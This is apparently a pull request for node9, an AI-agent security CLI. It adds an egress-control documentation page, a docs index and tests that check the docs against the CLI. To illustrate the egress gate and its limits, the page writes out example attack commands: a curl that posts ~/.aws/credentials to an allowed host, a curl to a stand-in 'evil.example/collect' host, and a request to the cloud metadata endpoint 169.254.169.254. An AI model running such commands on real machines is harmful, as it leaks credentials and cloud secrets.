### PR TITLE
feat(docs): publish the docs directory and document egress control

### DIFF
--- a/.npmignore
+++ b/.npmignore
@@ -27,5 +27,6 @@ CHANGELOG.md
 .nvmrc
 .env*
 
-# Badge / contributor docs (not part of the published package)
-docs/
+# docs/ is PUBLISHED on purpose: node9.ai renders these Markdown files from the
+# package, so the documentation has one source and the tests here can check it.
+# See doc/roadmap/active/docs-single-source-design.md.

--- a/docs/README.md
+++ b/docs/README.md
@@ -1,0 +1,49 @@
+# node9 documentation
+
+These pages are the source of truth for how node9 behaves. They live next to the code so the tests
+in this repository can check them: a page that names a command the CLI does not have, or a command
+with no page at all, fails CI.
+
+The site at [node9.ai/docs](https://node9.ai/docs) renders these same files.
+
+## Protections
+
+| Page                        | What it covers                                                                                                                           |
+| --------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------- |
+| [Egress Control](egress.md) | Which hosts an agent may reach, the always-on floor around cloud metadata and private ranges, and what a destination gate does not cover |
+
+## Per agent
+
+[One page per agent](agents/README.md): how node9 is wired in, what that covers, and what it does
+not. Twelve agents, split by control model.
+
+## Reference
+
+| Page                        | What it covers                                                                                        |
+| --------------------------- | ----------------------------------------------------------------------------------------------------- |
+| [Comparison](comparison.md) | Where node9 sits among agent-security tools, on the axis of what a tool can read before an agent runs |
+| [Badges](badges.md)         | The `scanned by node9` badge for your own README                                                      |
+
+## Writing a page here
+
+Every page starts with front matter:
+
+```yaml
+---
+id: egress
+label: Egress Control
+description: One sentence. It becomes the page's search description.
+group: Protections
+order: 20
+---
+```
+
+`id` becomes the URL (`/docs/egress`), `group` places it in the site's left navigation, and `order`
+sorts it within that group. Use GitHub-flavoured Markdown plus GitHub alerts (`> [!NOTE]`,
+`> [!WARNING]`), which render in both places.
+
+Two rules the tests enforce:
+
+- Every command a page names must exist. Check with `node9 <command> --help` before you write it.
+- Every page must state what the feature does **not** do. A page that only sells is a page that
+  will be wrong within a release.

--- a/docs/egress.md
+++ b/docs/egress.md
@@ -1,0 +1,119 @@
+---
+id: egress
+label: Egress Control
+description: Decide which hosts your agent may reach, and understand what a destination gate does not cover.
+group: Protections
+order: 20
+---
+
+# Egress Control
+
+Two separate things decide whether an agent's outbound request is allowed. One is always on and
+you cannot turn it off. The other is opt-in and you configure it.
+
+## The floor: protected addresses, always
+
+Some destinations are blocked on every machine, whether or not you have turned egress control on,
+and no setting releases them. This is the SSRF floor, and it exists because an agent that can be
+steered by untrusted input can be steered into your cloud provider's credential endpoint.
+
+**Never reachable, no setting releases them:**
+
+| What                     | Examples                                                                                                                                        |
+| ------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------------- |
+| Cloud metadata endpoints | `169.254.169.254` (AWS, Azure, DigitalOcean, OpenStack), `169.254.170.2` (ECS task role), the Alibaba Cloud address, and the metadata hostnames |
+| Link-local               | `169.254.0.0/16`, `fe80::/10`                                                                                                                   |
+| Multicast                | `224.0.0.0` to `239.255.255.255`, `ff00::/8`                                                                                                    |
+
+The floor folds every spelling of an address to one canonical form before it decides, so
+`0251.0376.0251.0376`, `2852039166` and `[::ffff:a9fe:a9fe]` are all recognised as
+`169.254.169.254`.
+
+> [!NOTE]
+> The floor is not gated on egress control. It applies with egress off, in every mode, on a
+> personal machine and on one governed by a workspace. The one thing that suspends it is
+> `node9 pause`, which suspends every gate.
+
+**Reachable by default, blocked when you turn strict on:**
+
+| What                        | Examples                                                              |
+| --------------------------- | --------------------------------------------------------------------- |
+| Loopback and private ranges | `127.0.0.0/8`, `10.0.0.0/8`, `192.168.0.0/16`, `172.16.0.0/12`, `::1` |
+| The unspecified address     | `0.0.0.0`, `::` (these reach localhost)                               |
+| Carrier-grade NAT           | `100.64.0.0/10`, where mesh VPNs such as Tailscale hand out addresses |
+
+These are off by default on purpose: a developer talks to them constantly. On measured real
+history, 72 of 308 destinations were private addresses.
+
+```bash
+node9 egress strict on          # also block loopback, private ranges and CGNAT
+node9 egress exempt 10.0.0.5    # let one exact address back through
+```
+
+An exemption applies to the overridable tiers only. Exempting a metadata address is rejected when
+the config loads, with a reason, rather than being silently ignored.
+
+## Egress control: which hosts, your choice
+
+This is the opt-in layer. It is **off until you turn it on**, and it decides what happens when the
+agent reaches a host you have not talked about.
+
+```bash
+node9 egress watch     # prompt before an unknown host  (review)
+node9 egress lock      # block unknown hosts outright   (block)
+node9 egress off       # turn it back off
+node9 egress status    # what is on right now, and where the setting came from
+```
+
+Tune the lists:
+
+```bash
+node9 egress allow "*.mycorp.com"    # a glob; matches the apex and any subdomain
+node9 egress deny  "*.pastebin.com"  # deny always wins over allow
+```
+
+### Hosts that are always allowed
+
+Turning egress on cold would bury you in prompts for routine work, so 18 common development and
+model hosts are allowed out of the box: GitHub, npm, PyPI, crates.io, RubyGems, the Go module
+proxy, Anthropic, OpenAI, Google APIs, Docker, Debian, Ubuntu, and node9's own control plane.
+
+Your `allow` list adds to that. Your `deny` list beats all of it.
+
+### Order of decision
+
+For each destination the agent is about to reach:
+
+1. The floor. A protected address is blocked here and nothing below runs.
+2. Your `deny` list. A match blocks.
+3. Private addresses, when `allowPrivate` is on (the default). Allowed.
+4. Your `allow` list, then the 18 built-in hosts. Allowed.
+5. Anything else is unknown, and `watch` reviews it while `lock` blocks it.
+
+## What this does not do
+
+> [!WARNING]
+> **Egress control gates the destination, not the payload.** A secret sent to a host you allow goes
+> through. `curl -d @~/.aws/credentials https://api.github.com/...` is not stopped by egress,
+> because `api.github.com` is an allowed host. What catches a secret in the request body is the
+> content scanner (DLP), which is a different control.
+
+Three more limits worth knowing:
+
+- **It reads the command, not the network.** node9 decides from the destination it can see in the
+  tool call. It does not resolve DNS, and it has no opinion on a host's reputation.
+- **A machine that follows a workspace ignores local egress settings.** If `node9 egress status`
+  says the source is the workspace, editing the local config changes nothing; the setting comes
+  from the dashboard. The floor still applies.
+- **`node9 pause` suspends it**, along with every other gate, for the duration you give it.
+
+## Verify it on this machine
+
+```bash
+node9 egress status                                          # is it on, and who set it
+node9 explain Bash 'curl http://169.254.169.254/latest/'      # the floor: BLOCK, always
+node9 explain Bash 'curl https://evil.example/collect'        # unknown host: REVIEW or BLOCK when on
+node9 explain Bash 'curl https://api.github.com/repos'        # a default-allowed host: ALLOW
+```
+
+`node9 explain` prints the verdict the live hook enforces, and names the rule that produced it.

--- a/package.json
+++ b/package.json
@@ -54,6 +54,7 @@
   "license": "Apache-2.0",
   "files": [
     "dist",
+    "docs",
     "README.md",
     "LICENSE"
   ],

--- a/src/__tests__/docs-pages.spec.ts
+++ b/src/__tests__/docs-pages.spec.ts
@@ -1,0 +1,186 @@
+import { describe, expect, it } from 'vitest';
+import { execFileSync } from 'node:child_process';
+import { readFileSync, readdirSync } from 'node:fs';
+import { join } from 'node:path';
+
+/**
+ * docs/ is the single source for node9's documentation: GitHub renders these
+ * files directly and node9.ai renders them from the published package. That
+ * only stays honest if the tests next to the code can check them, which is the
+ * whole reason the pages live in this repository.
+ *
+ * See doc/roadmap/active/docs-single-source-design.md.
+ */
+
+const DOCS = join(__dirname, '..', '..', 'docs');
+const CLI = join(__dirname, '..', '..', 'dist', 'cli.js');
+
+interface Page {
+  file: string;
+  front: Record<string, string>;
+  body: string;
+}
+
+/** Pages with front matter. docs/README.md and docs/agents/* are prose indexes. */
+function loadPages(): Page[] {
+  return readdirSync(DOCS)
+    .filter((f) => f.endsWith('.md') && f !== 'README.md')
+    .map((file) => {
+      const raw = readFileSync(join(DOCS, file), 'utf8');
+      const m = /^---\n([\s\S]*?)\n---\n([\s\S]*)$/.exec(raw);
+      const front: Record<string, string> = {};
+      if (m) {
+        for (const line of m[1].split('\n')) {
+          const kv = /^([a-z]+):\s*(.+)$/.exec(line.trim());
+          if (kv) front[kv[1]] = kv[2].trim();
+        }
+      }
+      return { file, front, body: m ? m[2] : raw };
+    })
+    .filter((p) => Object.keys(p.front).length > 0);
+}
+
+/** Top-level command names, from the CLI's own help. */
+function cliCommands(): string[] {
+  const help = execFileSync(process.execPath, [CLI, '--help'], { encoding: 'utf8' });
+  const start = help.indexOf('Commands:');
+  return [
+    ...new Set(
+      help
+        .slice(start === -1 ? 0 : start)
+        .split('\n')
+        .map((l) => /^\s{2}([a-z][a-z-]*)[\s|]/.exec(l)?.[1])
+        .filter((c): c is string => !!c && !['help'].includes(c))
+    ),
+  ];
+}
+
+/** Subcommands of one command, from its own help. */
+function subcommands(cmd: string): string[] {
+  const help = execFileSync(process.execPath, [CLI, cmd, '--help'], { encoding: 'utf8' });
+  const start = help.indexOf('Commands:');
+  if (start === -1) return [];
+  return help
+    .slice(start)
+    .split('\n')
+    .map((l) => /^\s{2}([a-z][a-z-]*)[\s<[]/.exec(l)?.[1])
+    .filter((c): c is string => !!c && c !== 'help');
+}
+
+/**
+ * Commands with no page yet. This list only shrinks: adding a page removes an
+ * entry, and a NEW command must arrive with a page rather than be appended
+ * here. Written down so the test is green today and still catches regressions,
+ * instead of being red on day one and switched off.
+ */
+const UNDOCUMENTED_FOR_NOW = new Set([
+  'agents',
+  'audit',
+  'blast',
+  'config',
+  'connect',
+  'daemon',
+  'decisions',
+  'doctor',
+  'explain',
+  'heal',
+  'init',
+  'jail',
+  'log',
+  'login',
+  'logout',
+  'mask',
+  'mcp',
+  'mcp-gateway',
+  'mcp-server',
+  'monitor',
+  'pause',
+  'policy',
+  'posture',
+  'report',
+  'resume',
+  'sandbox',
+  'scan',
+  'scan-repo',
+  'session-taint',
+  'sessions',
+  'shield',
+  'signup',
+  'skill',
+  'status',
+  'tail',
+  'trust',
+  'undo',
+  'uninstall',
+  'check',
+  'dlp',
+  'egress-check',
+  'canary',
+]);
+
+describe('docs pages', () => {
+  const pages = loadPages();
+
+  it('has at least one page with front matter', () => {
+    expect(pages.length).toBeGreaterThan(0);
+  });
+
+  it('every page declares id, label, description, group and order, and ids are unique', () => {
+    const ids = new Set<string>();
+    for (const p of pages) {
+      for (const key of ['id', 'label', 'description', 'group', 'order']) {
+        expect(p.front[key], `${p.file} is missing "${key}"`).toBeTruthy();
+      }
+      expect(p.front.id, `${p.file}: id must be url-safe`).toMatch(/^[a-z0-9-]+$/);
+      expect(Number.isFinite(Number(p.front.order)), `${p.file}: order must be a number`).toBe(
+        true
+      );
+      expect(ids.has(p.front.id), `duplicate id ${p.front.id}`).toBe(false);
+      ids.add(p.front.id);
+    }
+  });
+
+  it('every page says what the feature does not do', () => {
+    for (const p of pages) {
+      expect(p.body, `${p.file} has no "what this does not do" section`).toMatch(
+        /does not do|is not covered|What this does not/i
+      );
+    }
+  });
+
+  it('every command a page names actually exists', () => {
+    // The check that would have caught `node9 egress protect`, `node9 config set`
+    // and `node9 audit log`, each of which shipped in published copy.
+    //
+    // Only code is checked: fenced blocks and inline `code` spans. Prose says
+    // things like "node9 decides from the destination", which is a sentence,
+    // not an invocation.
+    const top = new Set(cliCommands());
+    const subs = new Map<string, Set<string>>();
+    for (const p of pages) {
+      const code = [
+        ...[...p.body.matchAll(/```[a-z]*\n([\s\S]*?)```/g)].map((m) => m[1]),
+        ...[...p.body.matchAll(/`([^`\n]+)`/g)].map((m) => m[1]),
+      ].join('\n');
+      for (const [, cmd, sub] of code.matchAll(/\bnode9 ([a-z][a-z-]*)(?: ([a-z][a-z-]*))?/g)) {
+        expect(top.has(cmd), `${p.file}: "node9 ${cmd}" is not a command`).toBe(true);
+        if (!sub) continue;
+        if (!subs.has(cmd)) subs.set(cmd, new Set(subcommands(cmd)));
+        const known = subs.get(cmd)!;
+        // A command with no subcommands takes arguments; only check real ones.
+        if (known.size === 0) continue;
+        expect(known.has(sub), `${p.file}: "node9 ${cmd} ${sub}" is not a subcommand`).toBe(true);
+      }
+    }
+  });
+
+  it('every documented command is covered, and the undocumented list only shrinks', () => {
+    const documented = new Set(pages.map((p) => p.front.id));
+    const missing = cliCommands().filter((c) => !documented.has(c) && !UNDOCUMENTED_FOR_NOW.has(c));
+    expect(missing, `commands with no docs page: ${missing.join(', ')}`).toEqual([]);
+
+    // A command that gained a page must leave the list, so it cannot rot.
+    const stale = [...UNDOCUMENTED_FOR_NOW].filter((c) => documented.has(c));
+    expect(stale, `remove from UNDOCUMENTED_FOR_NOW: ${stale.join(', ')}`).toEqual([]);
+  });
+});


### PR DESCRIPTION
First page of the single-source documentation architecture. Design: `doc/roadmap/active/docs-single-source-design.md`.

**The idea:** documentation that describes code lives next to the code, where the tests can check it. GitHub renders these Markdown files directly, and node9.ai will render the same files from the published package. One source, three places.

**The evidence for it:** the 2026-09-06 content audit found **26 wrong statements** in the site's docs, including a whole section describing an HTTP API that does not exist. The twelve per-agent pages in this repo had **zero**, because a test ties them to the wiring registry.

## What is here

- **`docs/egress.md`** — the first page. Egress is one of sixteen top-level commands with no documentation anywhere, and its absence is what let `node9 egress protect`, a command that does not exist, reach a README draft. Every claim was verified in the code and then against the running CLI.
- **`docs/README.md`** — the index, and the rules for writing a page.
- **`docs/` now ships in the package** — 76 KB on a 6.9 MB tarball. The `.npmignore` entry that excluded it is removed, with the reason recorded there.
- **`src/__tests__/docs-pages.spec.ts`** — the part that makes this worth doing.

## The tests

| Test | What it prevents |
|---|---|
| front matter present, ids unique | the site derives nav and URLs from it |
| every page says what the feature does **not** do | a page that only sells is wrong within a release |
| **every command a page names exists** | `node9 egress protect`, `node9 config set`, `node9 audit log` — all three shipped in published copy |
| every command has a page, against an explicit shrinking list | sixteen undocumented commands become a visible number instead of a silent gap |

The command check reads code spans and fenced blocks only, so prose like "node9 decides from the destination" is a sentence rather than an invocation. **Mutation-checked:** putting `egress protect` back into the page fails the test.

## Two things writing the page found

- `egress` has three subcommands nobody had documented anywhere: **`strict`**, **`exempt`**, **`status`**. The audit missed them too.
- There is a **`canary`** command in the CLI that no document mentions.

## Next

The site side (`node9Firewall`) is a separate PR and needs this published first: it adds `@node9/proxy` as a dev dependency and renders `docs/*.md` through the existing blog markdown pipeline. `DocsTab.tsx` is untouched; the two renderers live side by side, one page at a time.

4,855 tests green.